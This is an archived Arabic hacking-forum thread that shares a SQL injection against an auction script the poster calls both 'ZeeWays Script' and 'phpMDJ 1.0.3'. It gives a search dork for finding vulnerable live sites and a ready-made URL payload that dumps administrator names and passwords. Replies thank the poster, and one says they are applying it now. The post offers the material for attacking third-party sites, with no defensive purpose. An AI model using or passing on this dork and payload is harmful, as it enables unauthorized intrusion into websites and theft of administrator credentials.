:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/forumdisplay.php?f=38)
-   -   ثغرة في ZeeWays Script (http://www.vbspiders.com/vb/showthread.php?t=23620)

M!M0 01-11-2010 12:39 AM
ثغرة في ZeeWays Script
 
السلام عليكم ورحمة الله وبركاته

جبت لكم اليوم ثغرة في سكريبت phpMDJ 1.0.3

الثغرة من نوع SQL INJECTION

الذي يعشقها الكثير

نبدأ

دورك البحث عن المواقع المصابة

كود PHP:
Dork : [ inurl:"product_desc.php?id=" Powered by Zeeways.com 
طريقة الإستغلال
كود PHP:
http://server/auction/product_desc.php?id=-1/**/union/**/select/**/1,2,concat%28admin_name,0x3a3a3a,pwd%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin-- 

الثغرة من إكتشاف الأخ SyRiAn_34G13

إن شاء الله تستفيدوا

موفقين بإذن الله ...

X-Sn4k3 01-11-2010 06:37 PM
بارك الله فيك أخي على التغرة
تقبل مروري

T3BaN_HaCkEr 01-11-2010 07:29 PM
اشكرك يا معلم على النقل

الله يعطيك العافيه

iTaChi 01-11-2010 07:54 PM
جااري التطبيق يعطيك العافيه


الساعة الآن 12:50 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0